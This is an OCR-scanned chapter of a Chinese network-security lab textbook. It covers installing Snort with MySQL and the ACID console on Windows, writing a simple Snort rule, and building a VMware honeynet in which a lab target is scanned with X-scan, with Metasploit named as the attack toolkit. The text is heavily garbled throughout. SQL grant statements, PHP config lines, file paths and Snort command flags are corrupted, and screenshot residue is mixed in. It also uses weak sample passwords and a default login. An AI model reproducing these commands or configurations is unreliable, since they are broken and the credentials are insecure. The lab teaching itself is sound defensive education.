在 命令 行 方式 下 输入 net start mysql, 启 动 mysql 服务 。 在 安装 目录 下 运行 命令 (一 般 


为 C:\mysql\bin), 单 击 “ 开 始 ” 按 钮 ,选择 “运行 ”, 输 入 cmd, 在 出 现 的 命令 行 窗口 中 输入 下 
面 的 命令 。 


C:\> od mysql\bin 

C:\mysql\bin> mysql -u root -p 

mysql -u root -p 

输入 刚才 设置 的 root 密码 ,运行 以 下 命令 。 

create database Snort; // 输 入 分 号 后 mysal 才 会 编译 执行 语句 


create database Snort. archive; //create 语 句 建立 了 snort 运 行 必需 的 Snort 数据库 和 
//Snort. archive SH HE 
运行 以 下 命令 。 
C:\mysql\bin\mysql - D Snort - u root —p<C:\Snort\contrib\create_mysql 
C:\mysql\bin\mysql - D Snort archive - u root - p< C:\Snort\contrib\create_mysql 
上 面 两 个 语句 表示 以 root 用 户 身份 ,使 用 C:\Snort\contrib 目录 下 的 create. mysql 脚 


本 文件 ,在 Snort 数据 库 和 Snort_archive 数据 库 中 建立 了 Snort 运行 必需 的 数据 表 。 再 次 
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以 root 用 户 登 录 MySQL 数据 库 , 在 提示 符 后 输入 下 面 的 语句 。 


grant usage on * .* to "acid"@ "localhost" identified by "acidtest"; 
grant usage on * .* to "Snort"Q "localhost" identified by "Snorttest"; 


上 面 两 个 语句 表示 在 本 地 数据 库 中 建立 了 acid( 密 码 为 acidtest) 和 Snort (密码 为 
Snorttest) 两 个 用 户 ,以 备 后 面 使 用 。 


set password for "acid"? "localhost"- password ("123") ; 

set password for "Snort"@ "localhost"= password ('123') ; 

grant select, insert, update, delete, create, alter on Snort .* to "acid"@ 

"localhost"; 

grant select, insert, update, delete, create, alter on Sort archive .* to "acid" 

8 "localhost"; 

grant select, insert, update, delete, create, alter on Snort .* to "Snort"@ 

"localhost"; 

grant select, insert, update, delete, create, alter on Snort archive .* to 

"Snort" "localhost"; 

上 述 操作 是 为 新 建 的 用 户 在 Snort 和 Snort. archive 数据 库 中 分 配 权 限 。 

在 命令 提示 符 窗口 中 运行 以 下 命令 ,建立 Snort 输出 安全 事件 所 需要 的 表 , 其 中 C:\ 
snort 为 Snort 的 安装 目录 。 在 执行 命令 前 ,需要 将 snort_ mysql 复制 到 C 盘 下 ,当然 也 可 
以 复制 到 其 他 目录 。 


C: V» mysql - D mysql - u root -p<C:\snort mysql 


执行 该 命令 后 ,系统 提示 输入 root 的 密码 ,输入 密码 后 即 可 建立 所 需要 的 表 。 

5. 安装 其 他 工具 

(1) 安装 adodb, 解 压缩 adodb497. zip 到 C:\php\adodb 目录 下 。 

(2) 安装 jpgrapg 库 , 解 压缩 jpgraph-1. 22. 1. tar. gz 到 C:\php\jpgraph. Jf HEM C:\ 
php\jpgraph\sre\jpgraph. php ,添加 下 面 一 行内 容 。 


DEFINE "CACHE. DIR", "/trp/jpgraph cache/") ; 


(3) 安装 acid, 解 压缩 acid-0. 9. 6b23. tar. gz 到 C:\apache\htdocs\acid 目录 下 ,并 将 
Ci NapacheMitdocsVacidVacid. conf. php 文件 的 如 下 各 行内 容 修改 为 


S$DBLib_path="C:\php\adodb"; 
SDBtype= "mysql"; 
Salert doname- "Snort"; 
Salert host- "localhost"; 
$alert port- "3306"; 
Salert user- "acid"; 
Salert password- "acid"; 
/* Archive IB connection parameters * / 
Sarchive dbname- "Snort archive"; 
Sarchive host- "localhost"; 
Sarchive port "3306"; 
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Sarchive user- "acid"; 

Sarchive password- "acid"; 

SChartLib path= "C:\php\jpgraph\ sre"; 

(4) 通过 浏览 器 访问 http: /127. 0. 0. 1:50080/acid/acid db setup. php, 在 打开 的 页 面 
中 单 击 Create ACID AG 按钮 ,让 系统 自动 在 MySQL 中 建立 ACID 运行 必需 的 数据 库 ,如 
图 6.2.14 所 示 。 


J ACID: DB Setup - Microsoft Internet Explorer 
文件 Bg) SEW KRY IAD "R00 


ACID DB Setup Search AG Maintenance 


[ Back ] 


ACID tables Adds tables to extend the Snort DB to support the ACID functionality Create ACID AG 


JO 
Search Indexes (optional) Adds indexes to the Snort DB to optimize the speed of the queries us 


[Loaded in 1 seconds] 


Roman Danyliw AirCERT 


@ Internet 


mezu AOD 启 动 界 面 


6. 启动 Snort 

打开 C:\Snort\etc\Snort. conf 文件 ,将 文件 中 的 下 列 语句 : 
include classification.config 

include reference.config 


修改 为 绝对 路 径 : 


include C:\Snort\etc\classification.config 
include C:\Snort\etc\reference.config 


在 该 文件 的 最 后 加 入 下 面 的 语句 : 


output database: alert, mysql, host- localhost user- Snort password- Snorttest dbname- Snort encoding- hex 

detail- full 

通过 C:\>Snort -dev 测试 Snort 是 否 正常 , 若 能 看 到 一 只 正在 奔跑 的 小 猪 , 则 证 明 工 
作 正 常 ,如 图 6. 2. 15 所 示 。 

iit C:\>Snort -W 查看 本 地 网 络 适配器 编号 ,正式 启动 Snort。 

C: V» cd Snort\bin 

C:\Snort\bin> Snort - c "C:\Snort\etc\Snort .conf™ - i "C:\Snort\log" -d -e -X 

主意 ,其 中 -i 后 的 参数 为 网 卡 编号 ,由 Snort -W 查看 得 知 。 
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图 6215 m 启动 界面 


C:\Snort\bin> Snort - c "C:\Snort\etc\Snort.conf" - 1 "C:\Snort\logs"-i2-d-e-X 


X 参数 用 于 在 数据 链接 层 记 录 raw packet 数据 
数 用 于 记录 应 用 层 的 数据 。 

数 用 于 显示 /记录 第 二 层 报 文 头 数据 

数 用 以 指定 Snort 的 配置 文件 的 路 径 。 
数 用 于 指明 监听 的 网 络 接口 。 

在 cmd 中 运行 Snort -W.W 为 大 写 。 此 命令 可 以 作为 Snort 是 否 安装 成 功 的 标志 , 同 
时 可 以 看 到 运行 着 的 网 卡 信 和 - 般 情况 下 ,Snort -v 就 可 以 实现 简单 的 嗅 探 任务 。CTRL 

HC 用 于 结束 嗅 探 。 

RARE., RULE_PATH,SO_RULE_PATH, PREPROC_RULE_PATH, 
dynamicpreprocessor 和 dynamicengine 的 路 径 设置 必须 是 绝对 路 径 。 注 意 ,dynamicpreprocessor 
的 路 径 最 后 不 要 以 斜 杠 或 反 斜 杠 结尾 ,那样 会 造成 引擎 加 载 失败 

使 用 配置 的 命令 方式 为 


snort - v - c "C:\snort\etc\snort. conf" 

47 HH "ERROR: OpenAlertFileO => fopenOalert file log/alert. ids: No such file or 
directory”, 可 通过 以 下 命令 

snort - 1 C:\snort\mylogs - c C:\snort\etc\snort .conf 


将 文件 写 人 指定 目录 中 。 
在 浏览 器 中 输入 http://localhost:50080/acid/acid main. php, 进 入 acid 分 析 控 制 台 主 


界面 ,可 以 查看 人 侵 检测 的 结果 。ACID 显示 Snort 的 检测 结果 如 图 6. 2. 16 所 示 。 
利用 扫描 实验 的 要 求 扫描 局 域 网 ,查看 检测 的 结果 。 


安装 Snort 时 注意 关闭 防火 墙 。 
Apache 启动 命令 : apache -k install 或 | apache -k start, 
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‘Added 0 aleri(s) to the Alert cache 


Queried on : Fi December 22, 2006 1650:24 
Database: snort_aleri@lccalncs! (schema version: 0) 
Time window: (2005-12-22 16 13:22] - [2006-12-22 16 50:16] 


Analysis Console for Intrusion Databases 


im 


Sensors: 1 Traffic Profile by Protocol 
Unique Alerts: 12 Tesi 
‘Total Number of Alerts: 86 


UDP qj 
* Source |P addresses: 5 eu 
* Dest IP addresses: 4 

* Unquo IP irks 11 ICMP 88%) 


* Source Ports: 3 
o TCP (3) UDP (I Portscan Traftc 0%) 
* Dest Ports: 3 
o TCP (3) UDP (0) 


* Search 
© Graph Alert data 
* Snapshot 
* Most recent Alerts: any protocol. TCP, UDP, ICMP * Most frequent 5 Alerts 
© Today’: alerts unique, listing; IP erc / dst 
© Last 24 Hours: alerts unique, listing; IP src/ dst = Most Frequent Source Ports: any , TCP , UDP 
© Last 72 Houre: alerts unique, listing; IP src/ det * Most Frequent Destination Ports. any , TCP , UDP 


Most recent 19 Unique Alerts 


2 Most frequert 16 arkirassas. smurre destination 


图 6216 ACID 显示 Sot 的 检测 结果 


实验 报告 要 求 


。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
* 阐述 碰 到 的 问题 以 及 解决 方法 。 
tO pk SA. 


6.3 Snort 扩展 实验 


实验 器 材 


Snort 软件 系统 ,1 套 。 
PCCWindows XP/Windows 72.1 #7. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 入 侵 检测 技术 的 有 关内 容 。 
(2) 熟悉 Snort 软件 的 使 用 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 
通过 本 实验 ,进一步 熟悉 和 掌握 Snort 系统 ,完善 人 侵 检测 技能 。 
实验 环境 


装 有 Windows XP/Windows 7 操作 系统 的 PC 一 台 。 


e 183.5 


预备 知识 

入 侵 检 测 原 理 。 
SS UR 

1. 完善 配置 文件 


打开 


C:/Snort/etc/Snort. conf 文件 ,查看 现 有 配置 。 设置 Snort 的 内 、 外 网 检测 范围 。 


将 Snort. conf 文件 中 var HOME_NET any 语句 中 的 any 改 为 自己 所 在 的 子 网 地 址 ,即将 
Snort 监测 的 内 网 设置 为 本 机 所 在 局 域 网 。 如 本 地 IP 为 192.168.1.10, 则 将 any 改 为 192. 
168. 1.0/24, 并 将 var EXTERNAL_NET any 语句 中 的 any 改 为 1192. 168. 1. 0/24, 即 将 
Snort 监测 的 外 网 改 为 本 机 所 在 局 域 网 以 外 的 网 络 。 设置 监测 包含 的 规则 。 找 到 Snort 
.conf 文 件 中 描述 规则 的 部 分 ,如 图 6. 3. 1 FFAS. snort. conf 文件 中 包含 的 检测 规则 文件 ,如 


果 前 面 加 


# , 则 表示 该 规则 没有 启用 ,将 local. rules 之 前 的 井 去 掉 , 其 余 规则 保持 不 变 。 


include $RULE_PATH/finger .rules 
include $RULE_PATH/ftp.rules 
include $RULE PRTH/telnet.rules 


i#include $RULE_PATH/rpe .rules 
#include $RULE PATH/rservices.rules 


|#include $RULE_PATH/dos.rules 


include $RULE_PATH/ddos.rules 
include $RULE_PATH/dns.rules 


图 631 Sat 配置 页 面 


2. 使 用 控制 台 查 看 检测 结果 


TT 


http: //localhost/acid/acid main. php 网 页 .启动 Snort 并 打开 ACID 检测 控制 台 


主 界面 ,如 图 6. 3. 2 所 示 。 


(xO) MRE) HEV 收藏 和) HEO BHO IAD SOW MMA 


Tititi [€] http://127.0.0. 1:50080/acid/acid_man.php 


[C3 @Windovs Media Windows 个 村 的 Hotltat1 到 自 定义 链接 0 
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Sensors: 1 raffic Profile by Protocol 
Unique Alerts:34 ( 10 TCP. 
categories ) 

(Total Number of Alerts: 2021 


UDP (« 196) 


* Source IP addresses: 41 
© Dest. IP addresses: 108 | ICMP (20%) 
* Unique IP links 196 


© Source Ports: 782 Podtscan TIBIRe (0%) 


O TCP ( 749) UDP 
3 


© Dest. Ports: 19 
O TCP ( 18) UDP 


图 632 ACID 控制 台 主 界面 


单 击 图 6.3.2 中 TCP 后 的 数字 “80%”, 将 显示 所 有 检测 到 的 TCP 日 志 详 细 情 况 ,如 
图 6.3.3 所 示 。TCP 日 志 网 页 中 的 选项 依次 为 流量 类 型 .时 间 戳 、 源 地 址 .目标 地 址 以 及 协 
议 。 由 于 Snort 主机 所 在 的 内 网 为 202. 112. 108. 0, 可 以 看 出 ,日 志 中 只 记录 了 外 网 IP 对 内 
网 的 连接 ( 即 目标 地 址 均 为 内 网 ) 。 


Ñ ACID: Query Results - MYIE2 


xe) WEO BEM KA REAG HO) TAD BOW) Fac) a 


0O- 0-0-10 vc a$- e- ae a maea 
dutik (2) retp://127.0.0,1:50080/and/acid_qry_main.onp 加 是 ”搜索 | 人 "e a2 
O @Windows Media $]Yindors &YeRlHotlai) @) 让 定义 链接 
(ACID: ... Jal Anal... |e) Rf... | 
ource De = 
D gnature estamp n 
ddre dd = 
oto - Bj 
aj [snort] SHELLCODE x86 0x90 2004-12-29 TEP 
#100- unicode NOOP 11:26:51 202.112.101.34:1498 202.112.108.216:445 
a. 
1922) 
[s [snort] SHE. LCODE x86 M90 2004-12-28 TCP 
#101- unicode NOOP 1126:51 202.112.101.34:1498 202.112.108.216:445 
(1- 
1921) 
int [snort] SHELLCODE x86 0x90 2004-12-29 TCP 
3H02- unicode NOOP 1126551 202.112.101.34: 1468 202.112.108.216:445 
(1- 
1920) 
一 ——— rr -一 | 
wo $4522 1 4 


图 633 Shot 结果 检测 页 面 


选择 控制 条 中 的 Home 返回 控制 台 主 界面 。 主 界面 的 下 部 有 流量 分 析 及 归 类 选项 ,如 
图 6. 3.4 所 示 。 


fA Analysis Console for Intrusion E ses (ACID) - MyIE2 


T -ojx 
XFO MEC) EQ) 收藏 (A) REAGO MO) TAD SOW femen B-u 
A- 
O- 0-O0-3i26 rA e me CD-09)- G3- Q- C3 D C3 
Aik [6] Ftp://127.0.0. 1:50080/acid/acd. man pho + [RRE yorag 
C3 @Windows Media @) Vindows @)2MATHotMail e] 让 定义 链 拉 
ACID: ... [anatys. .. Je) Bt... | 
* Snapshot 
© Most recent Alerts: any protocol, TCP, © Most frequent 5 Alerts 
UDP, ICMP 
@ Today's: alerts unique, listing; IP src / * Most Frequent Source Ports: any , TCP , UDP 
dst * Most Frequent Destination Ports: any , TCP , UDP. 
* Last 24 Hours: alerts unique, listing; IP 
src / dst 
* Last 72 Hours: aleris unique, listing; IP 
src / det 
© Most recent 15 Unique Alerts 


E 


® Most frequent 15 addresses: source, destination 


© Last Source Forts: any , TCP , UDP 
© Last Destination Ports. any , TCP , UDP 


to saaga ism 


图 634 m 控制 台 检 测 页 面 


选择 Last 24 Hours:alerts unique, 可 以 看 到 24h 内 特殊 流量 的 分 类 记录 和 分 析 。 表 中 
详细 记录 了 各 类 型 流量 的 种 类 、 在 总 日 志 中 所 占 的 比例 .出 现 该 类 流量 的 起 始 和 终止 时 间 等 
详细 分 析 ( 在 控制 台 主 界面 中 还 有 其 他 功能 ,请 自己 练习 使 用 ) 。 

3. 配置 Snort 规则 

练习 添加 一 条 规则 ,以 对 符合 此 规则 的 数据 包 进 行 检测 ,打开 C: \Snort\rules\ local. 
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rules 文件 ,如 图 6.3.5 所 示 。 


&| local.rules - 记事 本 
ZEO RBO 格式 (2) TR) 


# This file intentionally does not come with signatures. Put your local 
M additions here. 


图 635 Sot 规则 编辑 文件 


在 规则 中 添加 一 条 语句 ,实现 对 内 网 的 UDP 相关 流量 进行 检测 ,并 报警 : udp ids/dns- 
version-query。 请 句 如 下 。 

alert udp any any <> $HOME_NET any (msg:" udp ids/dns-version-query " ; 
content; "version";) 保 存 文件 后 ,退出 。 重 启 Snort 和 acid 检测 控制 台 ,使 规则 生效 。 


实验 报告 要 求 


。 写 明 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阅 述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


6.4 基于 虚拟 蜜 网 的 网 络 攻防 实验 


实验 器 材 


PC( Windows XP/Windows 7),1 £i. 

蜜 网 网 关 虚 拟 机 Roo Honeywall CDROM v1.4.1 套 。 
靶 机 映像 Win32 Server, Sebek 客户 端 软件 ,1 套 。 
入侵 检测 软件 Snort,1 套 。 

IP 包 过 滤 软 件 Iptables,1 套 。 

渗透 攻击 工具 包 Metasploit. 套 。 


预习 要 求 


CD 做 好 实验 预习 ,复习 入 侵 检测 技术 的 有 关内 容 。 
(2) 熟悉 Honeywall CDROM vl. 4 的 使 用 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 目的 


通过 本 实验 ,熟悉 网 络 攻防 的 基本 原理 ,掌握 基于 虚拟 机 环境 的 网 络 攻 防 平台 搭建 方 
法 ,掌握 利用 该 攻防 平台 进行 基本 网 络 安 全 管理 的 使 用 方法 。 
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实验 环境 


操作 系统 : Windows XP/Windows 7。 
虚拟 机 : VMware Workstation 7.0。 


预备 知识 


1. 实验 关键 技术 

1) 虚拟 机 技术 

虚拟 机 系统 是 支持 多 种 操作 系统 并 行 于 一 个 物理 计算 机 上 的 应 用 系统 软件 ,是 一 种 可 
更 加 有 效 地 使 用 底层 硬件 的 技术 ,但 并 发 的 多 个 操作 系统 及 其 上 的 应 用 程序 是 在 “保护 模 
式 ? 环 境 下 运行 的 , 即 每 个 虚拟 系统 都 由 一 组 虚拟 化 设备 构成 ,都 有 对 应 的 虚拟 硬件 ,每 个 虚 
拟 系统 单独 运行 而 互 不 干扰 ,各 自 拥 有 自己 独立 的 CMOS .硬盘 和 操作 系统 ,同时 可 将 它们 
联 成 一 个 虚拟 网 络 ,用 来 学 习 和 实验 网 络 方面 的 有 关 知 识 ,又 可 节省 物理 硬件 设备 ,管理 方 
便 ,安全 性 又 高 ,非常 适合 用 来 构建 网 络 实验 平台 。 

2) 虚拟 蜜 网 技术 

虚拟 蜜 网 是 指 通 过 应 用 虚拟 机 软件 ,在 同一 时 间 、 同 一 硬件 平台 上 模拟 运行 多 个 操作 系 
统 , 部 署 若 干 虚拟 蜜 钢 构成 的 一 个 虚拟 网 络 。 该 虚拟 网 络 既 能 运行 传统 蜜 网 的 所 有 组 成 部 
分 ,具备 传统 蜜 网 的 所 有 功能 ,又 可 在 单个 主机 上 实现 整个 蜜 网 的 体系 架构 ,从 而 实现 在 单 
一 主机 上 部 署 整 个 蜜 网 系统 的 解决 方案 。 与 传统 蜜 网 相 比 ,虚拟 蜜 网 不 仅 节省 硬件 资源 ,成 
本 低廉 ,而 且 蜜 网 部 署 便捷 ,配置 集中 ,维护 简易 ,系统 容易 恢复 ,引入 的 安全 风险 较 低 , 非 常 
适合 在 设备 不 足 的 情况 下 搭建 网 络 安全 攻防 实验 平台 。 

2. 平台 的 设计 与 实现 

本 实验 基于 虚拟 机 软件 VMware 7. 0 和 虚拟 蜜 网 技术 ,构建 集 网 络 攻击 .防御 实验 于 一 
体 的 网 络 安全 实验 平台 ,并 用 实验 验证 平台 的 功能 。 应 用 该 平台 ,学员 可 以 任意 选取 攻击 对 
象 和 防御 策略 ,在 模拟 真实 环境 下 参与 攻 与 防 对 抗 演练 ,在 实战 模拟 中 理解 网 络 攻击 产生 的 
本 源 ,掌握 信息 安全 防御 技术 。 

3. Honeywall CDROM 简介 

Honeywall CDROM 是 基于 Fedora 的 发 行 .其 目标 是 用 来 捕获 网 络 空间 中 各 种 威胁 的 
具体 行为 ,并 能 对 捕获 的 数据 加 以 分 析 。 它 拥有 图 形 用 户 界面 ,用 于 系统 配置 ,管理 数据 分 
析 , 并 支持 Sebek 的 3. x 新 分 支 。 该 光盘 遵循 公用 许可 证 发 布 , 它 是 Honeynet 的 一 个 产 
品 。Honeynet 是 一 个 非 营 利 性 组 织 , 致 力 于 通过 免费 提供 最 新 的 研究 成 果 增 强 互 联网 络 的 
安全 性 。 虚 拟 蜜 网 网 络 拓扑 结构 如 图 6. 4.1 所 示 。 


实验 步 又 


1. 以 默认 方式 安装 VMware Workstation 
2. 安装 蜜 网 网 关 虚 拟 机 
(1) 选择 File New Virtual Machine 命令 ,新建 虚拟 机 ,选中 Custom 安装 ,如 图 6. 4. 2 
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攻击 机 ”虚拟 机 环境 


VMnet8 


| Windows XP VMware | 
| 

| 

| 

| (192.168.200.0/25 


VMnetl 
192.168.200.128/25) 


Win2KServer 
TEL 


| 
| 
| 
| 
| 
一 VMnet8 VMnet! EX 


: ) — 虚拟 网 卡 | T HERUM ET. / 
S 192.168.200.1 192.168.200.129. 


Welcome to the New Virtual 
Machine Wizard 


What type of configuration do you want? 


in a few easy steps. 


€ Custom Cedvancedol 
VMware Create a virtual machine with advanced 
r options, 4 GUD) a5 à SON adepcer type, 
Workstation 7 equal dek type and compatitty 


图 642 选中 Qstom 安 装 


(2) 设置 VMware Workstation 版 本 为 6. 5-7.0, 如 图 6.4.3 所 示 。 
(3) 设置 CDROM 为 蜜 网 网 关 Roo v1. 4 软件 ISO. AU 6.4.4 所 示 。 
(4) 设置 蜜 网 网 关 虚 拟 机 名 与 路 径 ( 在 Location 文本 框 中 指定 一 个 明确 的 路 径 ) ,如 
图 6.4.5 所 示 。 
(5) 设置 蜜 网 网 关 虚 拟 硬件 ,选择 单 处 理 器 ,如 图 6.4. 6 所 示 。 
(6) 设置 蜜 网 网 关 虚 拟 机 内 存 , 建 议 设置 为 256MB, 如 图 6.4.7 所 示 。 
C 设置 网 络 连接 方式 ,选择 NAT 模式 ,后 面 需要 另 加 两 个 网 卡 ,如 图 6.4. 8 所 示 。 
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New Virtual Nachine Wizard 


Choose the Virtual Machine Hardware Compatibility 
Which hardware features are needed for this virtual machine? 


32 GB memory limit. 
4 processor limit. 
10 network adapter limit 


New Virtual Machine Wizard 


Guest Operating System Installation 
A virtual machine is ike a physical computer; & needs an operating 
system. How will you install the guest operating system? 


Install from: 
Instaler disc 


No drives available 


[C:\Documents and Settings|Administrator| S doy oo-1 .- v 


d) CentOS detected. 


O1 wil ingal the operating system later. 
The virtual machine will be created with a blank hard disk. 


Come J CB] Cott) Cem ) 


图 644 设置 COROM 为 蜜 网 网 关 Foo v14 软 件 ISO 
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New Virtual 


Nachine Wizard 


Name the Virtual Machine 
What name would you like to use for this virtual machine? 


Virtual machine name: 
Honeywall 


Location: 
D:\vmware\Honeywall 


The default location can be changed at Edt > Preferences. 


gest >) (cones 


图 645 设置 蜜 网 网 关 虚 拟 机 名 与 路 径 


Processor Configuration 
Specify the number of processors for this virtual machine. 


Processors 

Number of processors: a ~ | 

Number of cores per processor: [1 ~| 

Total processor cores: 1 

Come ] [mer wm Cit 


图 646 设置 蜜 网 网 关 虚拟 硬件 


Memory for the Virtual Machine 

How much memory would you like to use for this virtual machine? 
Memory 
Specify the amount of memory allocated to this virtual machine. The memory size 
must be a multiple of 4 MB. 
Memory for this virtual machine: 

[256 [$] me 

4 4 ^ A 1836 
A Guest OS recommended minimum: 512 MB 
A Recommended memory: 1024 MB 
A Maximum recommended memory: — 1736 MB 

Maximum configurable memory: 32768 M8 


图 647 设置 蜜 网 网 关 虚 拟 机 内 存 


Network Type 
What type of network do you want to add? 


Network connection 


O Use bjdoed networking 
Give the quest operating system direct access to an external Ethernet 


CO use host-only networking 
Connect the guest operating system to a private virtual network on the host 
computer. 


© Do not use a network connection 


Cee) Cieta) (cance J] 
图 648 设置 网 络 连接 方式 


(8) 设置 虚拟 硬盘 接口 类 型 。SCSI 接口 选择 LSI Logic, 如 图 6.4.9 所 示 。 
(9) 创建 虚拟 硬盘 ,如 图 6.4. 10 所 示 。 

(10) 设置 虚拟 硬盘 为 SCSI 硬盘 ,如 图 6.4. 11 所 示 。 

(11) 设置 虚拟 硬盘 大 小 为 8GB, 无 须 立 即 分 配 空间 ,如 图 6. 4. 12 所 示 。 


(12) 指定 硬盘 文件 的 绝对 路 径 。 注 意 ,必须 给 出 全 路 径 , 不 能 有 中 文字 符 , 如 图 6. 4. 13 
所 示 。 
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New Virtual Machine Vizard 


Select 1/0 Adapter Types 
Which SCSI adapter type would you lias to use? 


WO adapter types 
IDE Adapter: ATAPI 
SCSI Adapter! © DusLogic 

OLSI Logic SAS 


649 设置 虚拟 硬盘 接口 类 型 


New Virtual Bach 


Select « Dixk 
do you want thix drive to uxe? 


z composed of one or more files on the host file system, which will 
ingle hard disk to the guest operating system, Virtual disks can 
ied or moved on the same host or between hosts, 


axisting virtual disk 
thie option to reuse a previously configured disk. 


© Use a physical disk (for advanced users) 
Choose this option to give the virtual machine direct access to a local hard disk, 


图 6410 创建 虚拟 硬盘 


Select a Disk Type 
What kind of dick do you want to create? 


Virtual disk type 
Owe 
COÉCSI] (Recommended) 


Cp ) CSpot} Cue >) Cose ) 


图 6411 设置 虚拟 硬盘 为 SCS 硬盘 


Kew Virtual Nachine Wizard 


Specify Disk Capacity 
How large do you want this disk to be? 


Maximum disk size (GB): 6.0 > 


Recommended size For CentOS: 20 GB 


Diattocate all disk space now. 


Allocating the full capacity can enhance performance but requires as much 
ee If you do not allocate all 

disk space now, the virtual disk starts small and is created quickly, It grows as 
you add applications, files and data. 


© Store virtual disk as a single fle 


© Split virtual disk into 2 GB files 
Splitting the dick makes it easier to move the virtual machine to another 
computer, 


641 设置 虚拟 硬盘 大 小 


New Virtual Wachine Wizard 


Specify Disk File 
Where would you like to store the disk file? 


Disk File 
One 8 GB disk file wil be created using the file name provided here. 


D:|vmwaregHoneywalHoneyvall. vmdk. 


A648 指定 硬盘 文件 的 绝对 路 径 


(13) 添加 两 块 网 卡 , 单 击 图 6. 4. 14 中 的 Customize Hardware 按钮 ,如 图 6. 4. 14 


所 示 。 
(14) 单 击 图 6.4.15 中 的 Add 按钮 ,按照 提示 步骤 添加 两 块 网 卡 ,其 中 Ethernet2 设置 


为 Hostronly,Ethernet3 设置 为 NAT, 如 图 6.4.15 所 示 。 
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Ready to Create Virtual Machine 
Click Finish to create the virtual machine and start installing CentOS. 


The virtual machine wil be created with the Following settings: 


Nane: 

Location: 
Version: 
Operating Sy... 


Hard Disk 
Menory: 
Network Adap. 
Other Devices: 


Koneywall 

D: \vnware\Honeywall 
Yorkstation 6.5-7.0 
CentOS 


WAT 
CD/DVD, Floppy, USB Controller, Sound Card 


[V] power on this virtual machine after creation 


[set Core) (cancel) 


图 6414 显示 配置 


© New CDJDVO (IDE) 
EJ Floppy 
Vg network Adapter 
USB Controller 
) Sound Card 
Boisplay 


Memory 


Specify the amount of memory allocated to this virtual 
machine. The memory size must be a mubiple of 4 MB. 


(Memory swapping may occur beyond this size.) 
Maximum configurable memory: 


C150 启动 蜜 网 网 关 虚 拟 机 ,进入 如 下 的 安装 界面 , 按 回 车 键 进行 安装 ,如 图 


所 示 。 


图 6415 Hardwere 配 置 


6. 4. 16 


(16) 安装 完成 ,提示 输入 用 户 名 及 密码 ,如 图 6. 4. 17 所 示 ; 默 认 账 户 为 roo, 密 码 为 


honey。 
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The Honeynet 


图 6416 安装 密 网 网 关 


Tile Edit View WW Toar ACE Windows Help CE RA 
F1 ER E37 f| E3 : earn 
f Home! gr Windows XP Professenal-" other Linux 2.6.x kernel 


图 64T7 输入 用 户 名 和 密码 


3. 配置 蜜 网 网 关 
输入 “su-” 进 入 配置 界面 ,或 者 直接 输入 menu 命令 。 配 置 界 面 如 图 6. 4. 18 所 示 。 


W sebek LEG IJ - Sun VirtnalBor 
Ehu Ra) DIS] 


OPAO Crm 


E6418 配置 界面 


选择 Honeywall Configuration 对 Honeywall 进行 配置 ,可 选择 Interview 进行 交互 式 
的 配置 。 例 如 ,配置 蜜 饶 IP 地 址 ,如 图 6. 4. 19 所 示 «iX hb A SEE A BEY IP 地 址 。 

配置 网 关 的 管理 地 址 ,本 机 主机 可 以 访问 该 地 址 对 Honeywall 进行 管理 。 由 于 管理 接 
口 的 虚拟 网 卡 类 型 为 桥接 ,所 以 ,此 处 需要 配置 的 访问 地 址 , 同 本 地 IP 属于 -网 段 即 可 ， 
如 图 6. 4. 20 所 示 。 
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[E zedek [正在 运行 ] — Sun Yirtunillox 


ED ER ox 


DOPAO A Hue ca 
图 64 人 9 ACR Bee IP 地 址 


图 642 配置 网 关 管理 地 址 


配置 Sebek 服务 器 端 地 址 与 端口 ,其 他 选项 默认 即 可 。 配 置 完毕 ,本 地 用 户 可 以 直接 访 
In] https://192. 168. 1. 3, 查 看 网 关 状 态 ,如 图 6. 4. 21 所 示 。 


Xi 0) e m E 0 MH BE) IAG EM W 


Qd - EO ED M noce wary 
@ 00m G Sae 


The Honeynet 


zi 


E 19: 1081.3 OB - 


图 6421 登录 Hert 
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4. A 主机 启动 Windows 实验 台 , 安 装 Sebek 
蜜 饶 可 以 采用 已 安装 的 虚拟 机 镜像 或 Windows 实验 台 , 并 且 虚 拟 机 网 卡 需要 配置 成 为 


host-only 状态 。 示 例 IP 地 址 为 192. 168. 0. 4。 查 看 Honeywall 中 ethl 的 mac 地 址 ,如 
图 6. 4. 22 Bron. 


NNING NOARP 
rs:8 dropped :8 o 
@ droppe 


rrupt:18 address :8xd248 


图 6422 dht 的 mec 地 址 


从 工具 箱 中 下 载 Sebek 客户 端 ,在 虚拟 机 中 安装 ,并 单 击 配置 向 导 查 看 ethl 的 mac 地 


址 ,如 图 6.4. 22 所 示 。 之 后 输入 Honeywall 中 ethl 的 mac 地 址 ,如 图 6. 4. 23 所 示 ,其 他 选 
项 默认 即 可 。 


QAL- O- F| os xx | Ge 
HAE QD | C9 C: \Sebek-¥in32-3.0.5(1) 


文件 和 文件 夹 任务 Y Configuration Wizard exe 528 Kb 


Sebek Configuration Vizard - Server Configuration xj 


Server Configuration 
Sebek logs all data it collects to a central server. Please 


specify the information sebek will use to generate packets the 
server can collect. 


This field specifies the "c address to use for all D packets. If 
the logging serw one..han o 
Destination 


Destination 


This field 


Sebek Since the Erw server does not look at the Destination IP address 
when it collects packets, it is not required nor recommended to set this 


Deztination 192 . 168. 0 . 3 

This field defines the UDP destination port to be configured in the Sebek 
packets. This value is used by the Server to identify packets of 
Destination 1101 


«r-se[r-sm»] ea | æ | 
图 6429 安装 Sabek 系 统 监控 软件 


5. B 主机 进行 攻击 测试 

B 主机 选取 X-scan 对 目标 主机 192. 168. 0. 4 进行 攻击 .并 查看 Honeywall 状态 ,详细 
攻击 信息 如 图 6.4. 24 所 示 o 

图 6.4. 25 中 显示 对 目标 地 址 192. 168. 0.4 进行 了 用 户 名 的 破解 。 

6. 渗透 攻击 实验 

CD 攻击 的 工具 选择 Metasploit 的 工具 包 , 从 http:/ 
Framework/downloads. html 地 址 可 以 下 载 。 


// www. metasploit. com/projects/ 
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Sensor ID: 3232235779 Sensor Name: Honeywall: 192.168.1.3 
Install Dato: Sat Oct 7 22:22:55 2006 Last Update: Sat Oc 7 23:34:31 2006 
State: online 
Country: E Timezone: 9 
Latitude: Longitude: 
Netvork Type: edu 
Notes: Peking University Jianvel’s Honeynet| 
Activity Report 
